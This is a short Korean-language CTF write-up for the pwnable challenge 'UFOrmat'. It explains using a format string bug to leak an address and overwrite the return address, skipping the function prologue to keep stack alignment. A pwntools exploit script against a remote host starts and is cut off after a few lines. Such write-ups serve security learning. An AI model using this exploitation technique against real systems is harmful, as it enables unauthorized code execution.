Pwnable - UFOrmat communication 함수 안에서 fsb가 터진다. 총 두번 터진다. gift로 덮으면 된다. 첫 번째 fsb는 leak을 하기 위해서 사용했고, 두 번째는 ret를 gift로 덮는 데 사용했다. 그런데 그냥 gift로 덮으면 movaps에서 stack alignment가 깨져서 실행이 안되니까, 함수 프롤로그 과정을 생략한 주소를 넣어줬다. from pwn import * e= ELF('./UFOrmat') libc = ELF('./libc.so.6') #p = process('./UFOrmat',env={"LD_PRELOAD":"./libc.so.6"}) p = remote('3.35.222.217',5333) p.sendlineafter(b'>',b'y') p.s..
